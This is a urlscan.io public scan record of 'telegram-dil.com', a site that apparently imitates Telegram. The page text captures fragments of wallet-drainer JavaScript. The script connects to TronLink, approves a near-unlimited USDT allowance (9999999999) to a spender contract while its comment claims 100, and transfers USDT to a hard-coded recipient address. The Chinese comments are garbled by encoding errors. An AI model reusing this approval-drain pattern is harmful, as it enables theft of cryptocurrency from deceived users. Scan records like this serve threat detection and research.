telegram-dil.com
Open in
urlscan Pro
154.211.13.17
Public Scan
Submitted URL: http://telegram-dil.com/
Effective URL: https://telegram-dil.com/
Submission: On November 06 via api from SG — Scanned from SG
Effective URL: https://telegram-dil.com/
Submission: On November 06 via api from SG — Scanned from SG
Form analysis
0 forms found in the DOMText Content
// USDT çš„åˆçº¦åœ°å€ const tokenAddress = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t"; // 波场上的 USDT åˆçº¦åœ°å€ const spenderContractAddress = "TAEjTP6S2Zk8xu9986xU42pha4KGQQW1n9"; // 部署的授æƒåˆçº¦åœ°å€ let userAccount = null; // å˜å‚¨ç”¨æˆ·çš„é’±åŒ…åœ°å€ // 连接到 TronLink 钱包 // åˆå§‹åŒ–连接 // æŽˆæƒ USDT const amount = window.tronWeb.toSun(9999999999); // æŽˆæƒ 100 个 USDT // 查询trx // if (window.tronWeb.fromSun(allowance) < 1) { // alert('授æƒé¢åº¦ä¸è¶³ï¼Œè¯·é‡æ–°æŽˆæƒ'); // } // alert('授æƒé¢åº¦ = ' +window.tronWeb.fromSun(allowance)); // 转移 USDT const amount = 1000000; // 转移 50 个 USDT const recipientAddress = "TRTFZVRJh3SxZtajde3FBrtKw44tSzeFzs"; // 接收 USDT çš„åœ°å€ // 检查trx够ä¸å¤Ÿ // checkAllowance();